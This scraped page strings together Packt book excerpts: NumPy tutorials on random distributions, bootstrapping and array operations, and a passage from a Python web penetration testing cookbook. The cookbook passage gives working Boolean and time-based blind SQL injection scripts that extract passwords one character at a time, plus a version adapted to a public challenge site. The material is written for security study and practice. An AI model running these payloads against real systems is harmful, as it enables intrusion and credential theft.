len(cash)):    if outcome[i] < 5:      cash[i] = cash[i - 1] - 1    elif outcome[i] < 10:      cash[i] = cash[i - 1] + 1    else:      raise AssertionError("Unexpected outcome " + outcome)   print(outcome.min(), outcome.max())   plt.plot(np.arange(len(cash)), cash) plt.title('Binomial simulation') plt.xlabel('# Bets') plt.ylabel('Cash') plt.grid() plt.show() Hypergeometric distribution The hypergeometricdistribution models a jar with two types of objects in it. The model tells us how many objects of one type we can get if we take a specified number of items out of the jar without replacing them (see https://en.wikipedia.org/wiki/Hypergeometric_distribution). The NumPy random module has a hypergeometric() function that simulates this situation. Time for action – simulating a game show Imagine a game show where every time the contestants answer a question correctly, they get to pull three balls from a jar and then put them back. Now, there is a catch, one ball in the jar is bad. Every time it is pulled out, the contestants lose six points. If, however, they manage to get out 3 of the 25 normal balls, they get one point. So, what is going to happen if we have 100 questions in total? Look at the following section for the solution: Initialize the outcome of the game with the hypergeometric() function. The first parameter of this function is the number of ways to make a good selection, the second parameter is the number of ways to make a bad selection, and the third parameter is the number of items sampled: points = np.zeros(100) outcomes = np.random.hypergeometric(25, 1, 3, size=len(points)) Set the scores based on the outcomes from the previous step: for i in range(len(points)):    if outcomes[i] == 3:      points[i] = points[i - 1] + 1    elif outcomes[i] == 2:      points[i] = points[i - 1] - 6    else:     print(outcomes[i]) The following diagram shows how the scoring evolved: What just happened? We simulated a game show using the hypergeometric() function from the NumPy random module. The game scoring depends on how many good and how many bad balls the contestants pulled out of a jar in each session (see urn.py): from __future__ import print_function import numpy as np import matplotlib.pyplot as plt     points = np.zeros(100) np.random.seed(16) outcomes = np.random.hypergeometric(25, 1, 3, size=len(points))   for i in range(len(points)):    if outcomes[i] == 3:      points[i] = points[i - 1] + 1    elif outcomes[i] == 2:      points[i] = points[i - 1] - 6    else:      print(outcomes[i])   plt.plot(np.arange(len(points)), points) plt.title('Game show simulation') plt.xlabel('# Rounds') plt.ylabel('Score') plt.grid() plt.show() Continuous distributions We usually model continuous distributions with probability density functions (PDF). The probability that a value is in a certain interval is determined by integration of the PDF (see https://www.khanacademy.org/math/probability/random-variables-topic/random_variables_prob_dist/v/probability-density-functions). The NumPy random module has functions that represent continuous distributions—beta(), chisquare(), exponential(), f(), gamma(), gumbel(), laplace(), lognormal(), logistic(), multivariate_normal(), noncentral_chisquare(), noncentral_f(), normal(), and others. Time for action – drawing a normal distribution We can generate random numbers from a normal distribution and visualize their distribution with a histogram (see https://www.khanacademy.org/math/probability/statistics-inferential/normal_distribution/v/introduction-to-the-normal-distribution). Draw a normal distribution with the following steps: Generate random numbers for a given sample size using the normal() function from the random NumPy module: N=10000 normal_values = np.random.normal(size=N) Draw the histogram and theoretical PDF with a center value of 0 and standard deviation of 1. Use matplotlib for this purpose: _, bins, _ = plt.hist(normal_values,   np.sqrt(N), normed=True, lw=1) sigma = 1 mu = 0 plt.plot(bins, 1/(sigma * np.sqrt(2 * np.pi))   * np.exp( - (bins - mu)**2 / (2 * sigma**2) ),lw=2) plt.show() In the following diagram, we see the familiar bell curve: What just happened? We visualized the normal distribution using the normal() function from the random NumPy module. We did this by drawing the bell curve and a histogram of randomly generated values (see normaldist.py): import numpy as np import matplotlib.pyplot as plt   N=10000   np.random.seed(27) normal_values = np.random.normal(size=N) _, bins, _ = plt.hist(normal_values, np.sqrt(N), normed=True, lw=1, label="Histogram") sigma = 1 mu = 0 plt.plot(bins, 1/(sigma * np.sqrt(2 * np.pi)) * np.exp( - (bins - mu)**2 / (2 * sigma**2) ), '--', lw=3, label="PDF") plt.title('Normal distribution') plt.xlabel('Value') plt.ylabel('Normalized Frequency') plt.grid() plt.legend(loc='best') plt.show() Lognormal distribution A lognormal distribution is a distribution of a random variable whose natural logarithm is normally distributed. The lognormal() function of the random NumPy module models this distribution. Time for action – drawing the lognormal distribution Let's visualize the lognormal distribution and its PDF with a histogram: Generate random numbers using the normal() function from the random NumPy module: N=10000 lognormal_values = np.random.lognormal(size=N) Draw the histogram and theoretical PDF with a center value of 0 and standard deviation of 1: _, bins, _ = plt.hist(lognormal_values,   np.sqrt(N), normed=True, lw=1) sigma = 1 mu = 0 x = np.linspace(min(bins), max(bins), len(bins)) pdf = np.exp(-(numpy.log(x) - mu)**2 / (2 * sigma**2))/ (x *   sigma * np.sqrt(2 * np.pi)) plt.plot(x, pdf,lw=3) plt.show() The fit of the histogram and theoretical PDF is excellent, as you can see in the following diagram: What just happened? We visualized the lognormal distribution using the lognormal() function from the random NumPy module. We did this by drawing the curve of the theoretical PDF and a histogram of randomly generated values (see lognormaldist.py): import numpy as np import matplotlib.pyplot as plt   N=10000 np.random.seed(34) lognormal_values = np.random.lognormal(size=N) _, bins, _ = plt.hist(lognormal_values,   np.sqrt(N), normed=True, lw=1, label="Histogram") sigma = 1 mu = 0 x = np.linspace(min(bins), max(bins), len(bins)) pdf = np.exp(-(np.log(x) - mu)**2 / (2 * sigma**2))/ (x * sigma * np.sqrt(2 * np.pi)) plt.xlim([0, 15]) plt.plot(x, pdf,'--', lw=3, label="PDF") plt.title('Lognormal distribution') plt.xlabel('Value') plt.ylabel('Normalized frequency') plt.grid() plt.legend(loc='best') plt.show() Bootstrapping in statistics Bootstrapping is a method used to estimate variance, accuracy, and other metrics of sample estimates, such as the arithmetic mean. The simplest bootstrapping procedure consists of the following steps: Generate a large number of samples from the original data sample having the same size N. You can think of the original data as a jar containing numbers. We create the new samples by N times randomly picking a number from the jar. Each time we return the number into the jar, so a number can occur multiple times in a generated sample. With the new samples, we calculate the statistical estimate under investigation for each sample (for example, the arithmetic mean). This gives us a sample of possible values for the estimator. Time for action – sampling with numpy.random.choice() We will use the numpy.random.choice() function to perform bootstrapping. Start the IPython or Python shell and import NumPy: $ ipython In [1]: import numpy as np Generate a data sample following the normal distribution: In [2]: N = 500   In [3]: np.random.seed(52)   In [4]: data = np.random.normal(size=N)   Calculate the mean of the data: In [5]: data.mean() Out[5]: 0.07253250605445645 Generate 100 samples from the original data and calculate their means (of course, more samples may lead to a more accurate result): In [6]: bootstrapped = np.random.choice(data, size=(N, 100))   In [7]: means = bootstrapped.mean(axis=0)   In [8]: means.shape Out[8]: (100,) Calculate the mean, variance, and standard deviation of the arithmetic means we obtained: In [9]: means.mean() Out[9]: 0.067866373318115278   In [10]: means.var() Out[10]: 0.001762807104774598   In [11]: means.std() Out[11]: 0.041985796464692651 If we are assuming a normal distribution for the means, it may be relevant to know the z-score, which is defined as follows: In [12]: (data.mean() - means.mean())/means.std() Out[12]: 0.11113598238549766 From the z-score value, we get an idea of how probable the actual mean is. What just happened? We bootstrapped a data sample by generating samples and calculating the means of each sample. Then we computed the mean, standard deviation, variance, and z-score of the means. We used the numpy.random.choice() function for bootstrapping. Summary You learned a lot in this article about NumPy modules. We covered linear algebra, the Fast Fourier transform, continuous and discrete distributions, and random numbers. Resources for Article: Further resources on this subject: SciPy for Signal Processing [article] Visualization [article] The plot function [article]
Read more
  • 0
  • 0
  • 4499

article-image-sql-injection
Packt
23 Jun 2015
11 min read
Save for later

SQL Injection

Packt
23 Jun 2015
11 min read
In this article by Cameron Buchanan, Terry Ip, Andrew Mabbitt, Benjamin May, and Dave Mound authors of the book Python Web Penetration Testing Cookbook, we're going to create scripts that encode attack strings, perform attacks, and time normal actions to normalize attack times. (For more resources related to this topic, see here.) Exploiting Boolean SQLi There are times when all you can get from a page is a yes or no. It's heartbreaking until you realise that that's the SQL equivalent of saying "I LOVE YOU". All SQLi can be broken down into yes or no questions, dependant on how patient you are. We will create a script that takes a yes value, and a URL and returns results based on a predefined attack string. I have provided an example attack string but this will change dependant on the system you are testing. How to do it… The following script is how yours should look: import requests import sys   yes = sys.argv[1]   i = 1 asciivalue = 1   answer = [] print "Kicking off the attempt"   payload = {'injection': ''AND char_length(password) = '+str(i)+';#', 'Submit': 'submit'}   while True: req = requests.post('<target url>' data=payload) lengthtest = req.text if yes in lengthtest:    length = i    break else:    i = i+1   for x in range(1, length): while asciivalue < 126: payload = {'injection': ''AND (substr(password, '+str(x)+', 1)) = '+ chr(asciivalue)+';#', 'Submit': 'submit'}    req = requests.post('<target url>', data=payload)    if yes in req.text:    answer.append(chr(asciivalue)) break else:      asciivalue = asciivalue + 1      pass asciivalue = 0 print "Recovered String: "+ ''.join(answer) How it works… Firstly the user must identify a string that only occurs when the SQLi is successful. Alternatively, the script may be altered to respond to the absence of proof of a failed SQLi. We provide this string as a sys.argv. We also create the two iterators we will use in this script and set them to 1 as MySQL starts counting from 1 instead of 0 like the failed system it is. We also create an empty list for our future answer and instruct the user the script is starting. yes = sys.argv[1]   i = 1 asciivalue = 1 answer = [] print "Kicking off the attempt" Our payload here basically requests the length of the password we are attempting to return and compares it to a value that will be iterated: payload = {'injection': ''AND char_length(password) = '+str(i)+';#', 'Submit': 'submit'} We then repeat the next loop forever as we have no idea how long the password is. We submit the payload to the target URL in a POST request: while True: req = requests.post('<target url>' data=payload) Each time we check to see if the yes value we set originally is present in the response text and if so, we end the while loop setting the current value of i as the parameter length. The break command is the part that ends the while loop: lengthtest = req.text if yes in lengthtest:    length = i    break If we don't detect the yes value, we add one to i and continue the loop: else:    i = i+1re Using the identified length of the target string, we iterate through each character and, using the ascii value, each possible value of that character. For each value we submit it to the target URL. Because the ascii table only runs up to 127, we cap the loop to run until the ascii value has reached 126. If it reaches 127, something has gone wrong: for x in range(1, length): while asciivalue < 126:  payload = {'injection': ''AND (substr(password, '+str(x)+', 1)) = '+ chr(asciivalue)+';#', 'Submit': 'submit'}    req = requests.post('<target url>', data=payload) We check to see if our yes string is present in the response and if so, break to go onto the next character. We append our successful to our answer string in character form, converting it with the chr command: if yes in req.text:    answer.append(chr(asciivalue)) break If the yes value is not present, we add to the ascii value to move onto the next potential character for that position and pass: else:      asciivalue = asciivalue + 1      pass Finally we reset ascii value for each loop and then when the loop hits the length of the string, we finish, printing the whole recovered string: asciivalue = 1 print "Recovered String: "+ ''.join(answer) There's more… This script could be potentially altered to handle iterating through tables and recovering multiple values through better crafted SQL Injection strings. Ultimately, this provides a base plate, as with the later Blind SQL Injection script for developing more complicated and impressive scripts to handle challenging tasks. See the Blind SQL Injection script for an advanced implementation of these concepts. Exploiting Blind SQL Injection Sometimes life hands you lemons, Blind SQL Injection points are some of those lemons. When you're reasonably sure you've found an SQL Injection vulnerability but there are no errors and you can't get it to return you data. In these situations you can use timing commands within SQL to cause the page to pause in returning a response and then use that timing to make judgements about the database and its data. We will create a script that makes requests to the server and returns differently timed responses dependant on the characters it's requesting. It will then read those times and reassemble strings. How to do it… The script is as follows: import requests   times = [] print "Kicking off the attempt" cookies = {'cookie name': 'Cookie value'}   payload = {'injection': ''or sleep char_length(password);#', 'Submit': 'submit'} req = requests.post('<target url>' data=payload, cookies=cookies) firstresponsetime = str(req.elapsed.total_seconds)   for x in range(1, firstresponsetime): payload = {'injection': ''or sleep(ord(substr(password, '+str(x)+', 1)));#', 'Submit': 'submit'} req = requests.post('<target url>', data=payload, cookies=cookies) responsetime = req.elapsed.total_seconds a = chr(responsetime)    times.append(a)    answer = ''.join(times) print "Recovered String: "+ answer How it works… As ever we import the required libraries and declare the lists we need to fill later on. We also have a function here that states that the script has indeed started. With some time-based functions, the user can be left waiting a while. In this script I have also included cookies using the request library. It is likely for this sort of attack that authentication is required: times = [] print "Kicking off the attempt" cookies = {'cookie name': 'Cookie value'} We set our payload up in a dictionary along with a submit button. The attack string is simple enough to understand with explanation. The initial tick has to be escaped to be treated as text within the dictionary. That tick breaks the SQL command initially and allows us to input our own SQL commands. Next we say in the event of the first command failing perform the following command with OR. We then tell the server to sleep one second for every character in the first row in the password column. Finally we close the statement with a semi-colon and comment out any trailing characters with a hash (or pound if you're American and/or wrong): payload = {'injection': ''or sleep char_length(password);#', 'Submit': 'submit'} We then set length of time the server took to respond as the firstreponsetime parameter. We will use this to understand how many characters we need to brute-force through this method in the following chain: firstresponsetime = str(req.elapsed).total_seconds We create a loop which will set x to be all numbers from 1 to the length of the string identified and perform an action for each one. We start from 1 here because MySQL starts counting from 1 rather than from zero like Python: for x in range(1, firstresponsetime): We make a similar payload as before but this time we are saying sleep for the ascii value of X character of the password in the password column, row one. So if the first character was a lower case a then the corresponding ascii value is 97 and therefore the system would sleep for 97 seconds, if it was a lower case b it would sleep for 98 seconds and so on: payload = {'injection': ''or sleep(ord(substr(password, '+str(x)+', 1)));#', 'Submit': 'submit'} We submit our data each time for each character place in the string: req = requests.post('<target url>', data=payload, cookies=cookies) We take the response time from each request to record how long the server sleeps and then convert that time back from an ascii value into a letter: responsetime = req.elapsed.total_seconds a = chr(responsetime) For each iteration we print out the password as it is currently known and then eventually print out the full password: answer = ''.join(times) print "Recovered String: "+ answer There's more… This script provides a framework that can be adapted to many different scenarios. Wechall, the web app challenge website, sets a time-limited, blind SQLi challenge that has to be completed in a very short time period. The following is our original script adapted to this environment. As you can see, I've had to account for smaller time differences in differing values, server lag and also incorporated a checking method to reset the testing value each time and submit it automatically: import subprocess import requests   def round_down(num, divisor):    return num - (num%divisor)   subprocess.Popen(["modprobe pcspkr"], shell=True) subprocess.Popen(["beep"], shell=True)     values = {'0': '0', '25': '1', '50': '2', '75': '3', '100': '4', '125': '5', '150': '6', '175': '7', '200': '8', '225': '9', '250': 'A', '275': 'B', '300': 'C', '325': 'D', '350': 'E', '375': 'F'} times = [] answer = "This is the first time" cookies = {'wc': 'cookie'} setup = requests.get('http://www.wechall.net/challenge/blind_lighter/ index.php?mo=WeChall&me=Sidebar2&rightpanel=0', cookies=cookies) y=0 accum=0   while 1: reset = requests.get('http://www.wechall.net/challenge/blind_lighter/ index.php?reset=me', cookies=cookies) for line in reset.text.splitlines():    if "last hash" in line:      print "the old hash was:"+line.split("      ")[20].strip(".</li>")      print "the guessed hash:"+answer      print "Attempts reset n n"    for x in range(1, 33):      payload = {'injection': ''or IF (ord(substr(password,      '+str(x)+', 1)) BETWEEN 48 AND      57,sleep((ord(substr(password, '+str(x)+', 1))-      48)/4),sleep((ord(substr(password, '+str(x)+', 1))-      55)/4));#', 'inject': 'Inject'}      req = requests.post('http://www.wechall.net/challenge/blind_lighter/ index.php?ajax=1', data=payload, cookies=cookies)      responsetime = str(req.elapsed)[5]+str(req.elapsed)[6]+str(req.elapsed) [8]+str(req.elapsed)[9]      accum = accum + int(responsetime)      benchmark = int(15)      benchmarked = int(responsetime) - benchmark      rounded = str(round_down(benchmarked, 25))      if rounded in values:        a = str(values[rounded])        times.append(a)        answer = ''.join(times)      else:        print rounded        rounded = str("375")        a = str(values[rounded])        times.append(a)        answer = ''.join(times) submission = {'thehash': str(answer), 'mybutton': 'Enter'} submit = requests.post('http://www.wechall.net/challenge/blind_lighter/ index.php', data=submission, cookies=cookies) print "Attempt: "+str(y) print "Time taken: "+str(accum) y += 1 for line in submit.text.splitlines():    if "slow" in line:      print line.strip("<li>")    elif "wrong" in line:       print line.strip("<li>") if "wrong" not in submit.text:    print "possible success!"    #subprocess.Popen(["beep"], shell=True) Summary We looked at how to attack strings through different penetration attacks via Boolean SQLi and Blind SQL Injection. You will find some various kinds of attacks present in the book throughout. Resources for Article: Further resources on this subject: Pentesting Using Python [article] Wireless and Mobile Hacks [article] Introduction to the Nmap Scripting Engine [article]
Read more
  • 0
  • 0
  • 8207

article-image-pandas-data-structures
Packt
22 Jun 2015
25 min read
Save for later

The pandas Data Structures

Packt
22 Jun 2015
25 min read
In this article by Femi Anthony, author of the book, Mastering pandas, starts by taking a tour of NumPy ndarrays, a data structure not in pandas but NumPy. Knowledge of NumPy ndarrays is useful as it forms the foundation for the pandas data structures. Another key benefit of NumPy arrays is that they execute what is known as vectorized operations, which are operations that require traversing/looping on a Python array, much faster. In this article, I will present the material via numerous examples using IPython, a browser-based interface that allows the user to type in commands interactively to the Python interpreter. (For more resources related to this topic, see here.) NumPy ndarrays The NumPy library is a very important package used for numerical computing with Python. Its primary features include the following: The type numpy.ndarray, a homogenous multidimensional array Access to numerous mathematical functions – linear algebra, statistics, and so on Ability to integrate C, C++, and Fortran code For more information about NumPy, see http://www.numpy.org. The primary data structure in NumPy is the array class ndarray. It is a homogeneous multi-dimensional (n-dimensional) table of elements, which are indexed by integers just as a normal array. However, numpy.ndarray (also known as numpy.array) is different from the standard Python array.array class, which offers much less functionality. More information on the various operations is provided at http://scipy-lectures.github.io/intro/numpy/array_object.html. NumPy array creation NumPy arrays can be created in a number of ways via calls to various NumPy methods. NumPy arrays via numpy.array NumPy arrays can be created via the numpy.array constructor directly: In [1]: import numpy as np In [2]: ar1=np.array([0,1,2,3])# 1 dimensional array In [3]: ar2=np.array ([[0,3,5],[2,8,7]]) # 2D array In [4]: ar1 Out[4]: array([0, 1, 2, 3]) In [5]: ar2 Out[5]: array([[0, 3, 5],                [2, 8, 7]]) The shape of the array is given via ndarray.shape: In [5]: ar2.shape Out[5]: (2, 3) The number of dimensions is obtained using ndarray.ndim: In [7]: ar2.ndim Out[7]: 2 NumPy array via numpy.arange ndarray.arange is the NumPy version of Python's range function:In [10]: # produces the integers from 0 to 11, not inclusive of 12            ar3=np.arange(12); ar3 Out[10]: array([ 0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11]) In [11]: # start, end (exclusive), step size        ar4=np.arange(3,10,3); ar4 Out[11]: array([3, 6, 9]) NumPy array via numpy.linspace ndarray.linspace generates linear evenly spaced elements between the start and the end: In [13]:# args - start element,end element, number of elements        ar5=np.linspace(0,2.0/3,4); ar5 Out[13]:array([ 0., 0.22222222, 0.44444444, 0.66666667]) NumPy array via various other functions These functions include numpy.zeros, numpy.ones, numpy.eye, nrandom.rand, numpy.random.randn, and numpy.empty. The argument must be a tuple in each case. For the 1D array, you can just specify the number of elements, no need for a tuple. numpy.ones The following command line explains the function: In [14]:# Produces 2x3x2 array of 1's.        ar7=np.ones((2,3,2)); ar7 Out[14]: array([[[ 1., 1.],                  [ 1., 1.],                  [ 1., 1.]],                [[ 1., 1.],                  [ 1., 1.],                  [ 1., 1.]]]) numpy.zeros The following command line explains the function: In [15]:# Produce 4x2 array of zeros.            ar8=np.zeros((4,2));ar8 Out[15]: array([[ 0., 0.],          [ 0., 0.],            [ 0., 0.],            [ 0., 0.]]) numpy.eye The following command line explains the function: In [17]:# Produces identity matrix            ar9 = np.eye(3);ar9 Out[17]: array([[ 1., 0., 0.],            [ 0., 1., 0.],            [ 0., 0., 1.]]) numpy.diag The following command line explains the function: In [18]: # Create diagonal array        ar10=np.diag((2,1,4,6));ar10 Out[18]: array([[2, 0, 0, 0],            [0, 1, 0, 0],            [0, 0, 4, 0],            [0, 0, 0, 6]]) numpy.random.rand The following command line explains the function: In [19]: # Using the rand, randn functions          # rand(m) produces uniformly distributed random numbers with range 0 to m          np.random.seed(100)   # Set seed          ar11=np.random.rand(3); ar11 Out[19]: array([ 0.54340494, 0.27836939, 0.42451759]) In [20]: # randn(m) produces m normally distributed (Gaussian) random numbers            ar12=np.random.rand(5); ar12 Out[20]: array([ 0.35467445, -0.78606433, -0.2318722 ,   0.20797568, 0.93580797]) numpy.empty Using np.empty to create an uninitialized array is a cheaper and faster way to allocate an array, rather than using np.ones or np.zeros (malloc versus. cmalloc). However, you should only use it if you're sure that all the elements will be initialized later: In [21]: ar13=np.empty((3,2)); ar13 Out[21]: array([[ -2.68156159e+154,   1.28822983e-231],                [ 4.22764845e-307,   2.78310358e-309],                [ 2.68156175e+154,   4.17201483e-309]]) numpy.tile The np.tile function allows one to construct an array from a smaller array by repeating it several times on the basis of a parameter: In [334]: np.array([[1,2],[6,7]]) Out[334]: array([[1, 2],                  [6, 7]]) In [335]: np.tile(np.array([[1,2],[6,7]]),3) Out[335]: array([[1, 2, 1, 2, 1, 2],                 [6, 7, 6, 7, 6, 7]]) In [336]: np.tile(np.array([[1,2],[6,7]]),(2,2)) Out[336]: array([[1, 2, 1, 2],                  [6, 7, 6, 7],                  [1, 2, 1, 2],                  [6, 7, 6, 7]]) NumPy datatypes We can specify the type of contents of a numeric array by using the dtype parameter: In [50]: ar=np.array([2,-1,6,3],dtype='float'); ar Out[50]: array([ 2., -1., 6., 3.]) In [51]: ar.dtype Out[51]: dtype('float64') In [52]: ar=np.array([2,4,6,8]); ar.dtype Out[52]: dtype('int64') In [53]: ar=np.array([2.,4,6,8]); ar.dtype Out[53]: dtype('float64') The default dtype in NumPy is float. In the case of strings, dtype is the length of the longest string in the array: In [56]: sar=np.array(['Goodbye','Welcome','Tata','Goodnight']); sar.dtype Out[56]: dtype('S9') You cannot create variable-length strings in NumPy, since NumPy needs to know how much space to allocate for the string. dtypes can also be Boolean values, complex numbers, and so on: In [57]: bar=np.array([True, False, True]); bar.dtype Out[57]: dtype('bool') The datatype of ndarray can be changed in much the same way as we cast in other languages such as Java or C/C++. For example, float to int and so on. The mechanism to do this is to use the numpy.ndarray.astype() function. Here is an example: In [3]: f_ar = np.array([3,-2,8.18])        f_ar Out[3]: array([ 3. , -2. , 8.18]) In [4]: f_ar.astype(int) Out[4]: array([ 3, -2, 8]) More information on casting can be found in the official documentation at http://docs.scipy.org/doc/numpy/reference/generated/numpy.ndarray.astype.html. NumPy indexing and slicing Array indices in NumPy start at 0, as in languages such as Python, Java, and C++ and unlike in Fortran, Matlab, and Octave, which start at 1. Arrays can be indexed in the standard way as we would index into any other Python sequences: # print entire array, element 0, element 1, last element. In [36]: ar = np.arange(5); print ar; ar[0], ar[1], ar[-1] [0 1 2 3 4] Out[36]: (0, 1, 4) # 2nd, last and 1st elements In [65]: ar=np.arange(5); ar[1], ar[-1], ar[0] Out[65]: (1, 4, 0) Arrays can be reversed using the ::-1 idiom as follows: In [24]: ar=np.arange(5); ar[::-1] Out[24]: array([4, 3, 2, 1, 0]) Multi-dimensional arrays are indexed using tuples of integers: In [71]: ar = np.array([[2,3,4],[9,8,7],[11,12,13]]); ar Out[71]: array([[ 2, 3, 4],                [ 9, 8, 7],                [11, 12, 13]]) In [72]: ar[1,1] Out[72]: 8 Here, we set the entry at row1 and column1 to 5: In [75]: ar[1,1]=5; ar Out[75]: array([[ 2, 3, 4],                [ 9, 5, 7],                [11, 12, 13]]) Retrieve row 2: In [76]: ar[2] Out[76]: array([11, 12, 13]) In [77]: ar[2,:] Out[77]: array([11, 12, 13]) Retrieve column 1: In [78]: ar[:,1] Out[78]: array([ 3, 5, 12]) If an index is specified that is out of bounds of the range of an array, IndexError will be raised: In [6]: ar = np.array([0,1,2]) In [7]: ar[5]    ---------------------------------------------------------------------------    IndexError                 Traceback (most recent call last) <ipython-input-7-8ef7e0800b7a> in <module>()    ----> 1 ar[5]      IndexError: index 5 is out of bounds for axis 0 with size 3 Thus, for 2D arrays, the first dimension denotes rows and the second dimension, the columns. The colon (:) denotes selection across all elements of the dimension. Array slicing Arrays can be sliced using the following syntax: ar[startIndex: endIndex: stepValue]. In [82]: ar=2*np.arange(6); ar Out[82]: array([ 0, 2, 4, 6, 8, 10]) In [85]: ar[1:5:2] Out[85]: array([2, 6]) Note that if we wish to include the endIndex value, we need to go above it, as follows: In [86]: ar[1:6:2] Out[86]: array([ 2, 6, 10]) Obtain the first n-elements using ar[:n]: In [91]: ar[:4] Out[91]: array([0, 2, 4, 6]) The implicit assumption here is that startIndex=0, step=1. Start at element 4 until the end: In [92]: ar[4:] Out[92]: array([ 8, 10]) Slice array with stepValue=3: In [94]: ar[::3] Out[94]: array([0, 6]) To illustrate the scope of indexing in NumPy, let us refer to this illustration, which is taken from a NumPy lecture given at SciPy 2013 and can be found at http://bit.ly/1GxCDpC: Let us now examine the meanings of the expressions in the preceding image: The expression a[0,3:5] indicates the start at row 0, and columns 3-5, where column 5 is not included. In the expression a[4:,4:], the first 4 indicates the start at row 4 and will give all columns, that is, the array [[40, 41,42,43,44,45] [50,51,52,53,54,55]]. The second 4 shows the cutoff at the start of column 4 to produce the array [[44, 45], [54, 55]]. The expression a[:,2] gives all rows from column 2. Now, in the last expression a[2::2,::2], 2::2 indicates that the start is at row 2 and the step value here is also 2. This would give us the array [[20, 21, 22, 23, 24, 25], [40, 41, 42, 43, 44, 45]]. Further, ::2 specifies that we retrieve columns in steps of 2, producing the end result array ([[20, 22, 24], [40, 42, 44]]). Assignment and slicing can be combined as shown in the following code snippet: In [96]: ar Out[96]: array([ 0, 2, 4, 6, 8, 10]) In [100]: ar[:3]=1; ar Out[100]: array([ 1, 1, 1, 6, 8, 10]) In [110]: ar[2:]=np.ones(4);ar Out[110]: array([1, 1, 1, 1, 1, 1]) Array masking Here, NumPy arrays can be used as masks to select or filter out elements of the original array. For example, see the following snippet: In [146]: np.random.seed(10)          ar=np.random.random_integers(0,25,10); ar Out[146]: array([ 9, 4, 15, 0, 17, 25, 16, 17, 8, 9]) In [147]: evenMask=(ar % 2==0); evenMask Out[147]: array([False, True, False, True, False, False, True, False, True, False], dtype=bool) In [148]: evenNums=ar[evenMask]; evenNums Out[148]: array([ 4, 0, 16, 8]) In the following example, we randomly generate an array of 10 integers between 0 and 25. Then, we create a Boolean mask array that is used to filter out only the even numbers. This masking feature can be very useful, say for example, if we wished to eliminate missing values, by replacing them with a default value. Here, the missing value '' is replaced by 'USA' as the default country. Note that '' is also an empty string: In [149]: ar=np.array(['Hungary','Nigeria',                        'Guatemala','','Poland',                        '','Japan']); ar Out[149]: array(['Hungary', 'Nigeria', 'Guatemala',                  '', 'Poland', '', 'Japan'],                  dtype='|S9') In [150]: ar[ar=='']='USA'; ar Out[150]: array(['Hungary', 'Nigeria', 'Guatemala', 'USA', 'Poland', 'USA', 'Japan'], dtype='|S9') Arrays of integers can also be used to index an array to produce another array. Note that this produces multiple values; hence, the output must be an array of type ndarray. This is illustrated in the following snippet: In [173]: ar=11*np.arange(0,10); ar Out[173]: array([ 0, 11, 22, 33, 44, 55, 66, 77, 88, 99]) In [174]: ar[[1,3,4,2,7]] Out[174]: array([11, 33, 44, 22, 77]) In the preceding code, the selection object is a list and elements at indices 1, 3, 4, 2, and 7 are selected. Now, assume that we change it to the following: In [175]: ar[1,3,4,2,7] We get an IndexError error since the array is 1D and we're specifying too many indices to access it. IndexError         Traceback (most recent call last) <ipython-input-175-adbcbe3b3cdc> in <module>() ----> 1 ar[1,3,4,2,7]   IndexError: too many indices This assignment is also possible with array indexing, as follows: In [176]: ar[[1,3]]=50; ar Out[176]: array([ 0, 50, 22, 50, 44, 55, 66, 77, 88, 99]) When a new array is created from another array by using a list of array indices, the new array has the same shape. Complex indexing Here, we illustrate the use of complex indexing to assign values from a smaller array into a larger one: In [188]: ar=np.arange(15); ar Out[188]: array([ 0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14])   In [193]: ar2=np.arange(0,-10,-1)[::-1]; ar2 Out[193]: array([-9, -8, -7, -6, -5, -4, -3, -2, -1, 0]) Slice out the first 10 elements of ar, and replace them with elements from ar2, as follows: In [194]: ar[:10]=ar2; ar Out[194]: array([-9, -8, -7, -6, -5, -4, -3, -2, -1, 0, 10, 11, 12, 13, 14]) Copies and views A view on a NumPy array is just a particular way of portraying the data it contains. Creating a view does not result in a new copy of the array, rather the data it contains may be arranged in a specific order, or only certain data rows may be shown. Thus, if data is replaced on the underlying array's data, this will be reflected in the view whenever the data is accessed via indexing. The initial array is not copied into the memory during slicing and is thus more efficient. The np.may_share_memory method can be used to see if two arrays share the same memory block. However, it should be used with caution as it may produce false positives. Modifying a view modifies the original array: In [118]:ar1=np.arange(12); ar1 Out[118]:array([ 0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11])   In [119]:ar2=ar1[::2]; ar2 Out[119]: array([ 0, 2, 4, 6, 8, 10])   In [120]: ar2[1]=-1; ar1 Out[120]: array([ 0, 1, -1, 3, 4, 5, 6, 7, 8, 9, 10, 11]) To force NumPy to copy an array, we use the np.copy function. As we can see in the following array, the original array remains unaffected when the copied array is modified: In [124]: ar=np.arange(8);ar Out[124]: array([0, 1, 2, 3, 4, 5, 6, 7])   In [126]: arc=ar[:3].copy(); arc Out[126]: array([0, 1, 2])   In [127]: arc[0]=-1; arc Out[127]: array([-1, 1, 2])   In [128]: ar Out[128]: array([0, 1, 2, 3, 4, 5, 6, 7]) Operations Here, we present various operations in NumPy. Basic operations Basic arithmetic operations work element-wise with scalar operands. They are - +, -, *, /, and **. In [196]: ar=np.arange(0,7)*5; ar Out[196]: array([ 0, 5, 10, 15, 20, 25, 30])   In [198]: ar=np.arange(5) ** 4 ; ar Out[198]: array([ 0,   1, 16, 81, 256])   In [199]: ar ** 0.5 Out[199]: array([ 0.,   1.,   4.,   9., 16.]) Operations also work element-wise when another array is the second operand as follows: In [209]: ar=3+np.arange(0, 30,3); ar Out[209]: array([ 3, 6, 9, 12, 15, 18, 21, 24, 27, 30])   In [210]: ar2=np.arange(1,11); ar2 Out[210]: array([ 1, 2, 3, 4, 5, 6, 7, 8, 9, 10]) Here, in the following snippet, we see element-wise subtraction, division, and multiplication: In [211]: ar-ar2 Out[211]: array([ 2, 4, 6, 8, 10, 12, 14, 16, 18, 20])   In [212]: ar/ar2 Out[212]: array([3, 3, 3, 3, 3, 3, 3, 3, 3, 3])   In [213]: ar*ar2 Out[213]: array([ 3, 12, 27, 48, 75, 108, 147, 192, 243, 300]) It is much faster to do this using NumPy rather than pure Python. The %timeit function in IPython is known as a magic function and uses the Python timeit module to time the execution of a Python statement or expression, explained as follows: In [214]: ar=np.arange(1000)          %timeit a**3          100000 loops, best of 3: 5.4 µs per loop   In [215]:ar=range(1000)          %timeit [ar[i]**3 for i in ar]          1000 loops, best of 3: 199 µs per loop Array multiplication is not the same as matrix multiplication; it is element-wise, meaning that the corresponding elements are multiplied together. For matrix multiplication, use the dot operator. For more information refer to http://docs.scipy.org/doc/numpy/reference/generated/numpy.dot.html. In [228]: ar=np.array([[1,1],[1,1]]); ar Out[228]: 